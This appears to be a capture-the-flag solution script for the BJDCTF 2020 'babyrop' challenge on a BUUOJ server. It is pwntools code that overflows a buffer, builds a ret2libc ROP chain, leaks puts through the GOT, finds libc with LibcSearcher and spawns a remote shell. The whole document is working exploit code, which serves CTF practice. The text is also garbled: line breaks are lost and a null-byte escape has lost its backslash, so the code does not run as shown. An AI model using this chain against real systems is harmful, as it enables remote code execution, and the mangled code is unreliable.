找不到libc文件 用LibcSearcher模块
from pwn import * from LibcSearcher import * context.log_level='debug' r=remote('node3.buuoj.cn',28426) #r=process('./bjdctf_2020_babyrop') elf=ELF('./bjdctf_2020_babyrop') puts_got=elf.got['puts'] puts_plt=elf.plt['puts'] main_addr=elf.symbols['main'] pop_rdi=0x0000000000400733 payload='a'*0x20+'b'*0x8 payload+=p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64(main_addr) r.recvuntil('Pull up your sword and tell me u story!') r.sendline(payload) r.recv() puts_addr=u64(r.recv(6).ljust(8,'x00')) libc=LibcSearcher('puts',puts_addr) libc_base=puts_addr-libc.dump('puts') system_addr=libc_base+libc.dump('system') bin_addr=libc_base+libc.dump('str_bin_sh') payload='a'*0x20+'b'*0x8 payload+=p64(pop_rdi)+p64(bin_addr)+p64(system_addr) r.recvuntil('Pull up your sword and tell me u story!') r.sendline(payload) r.interactive()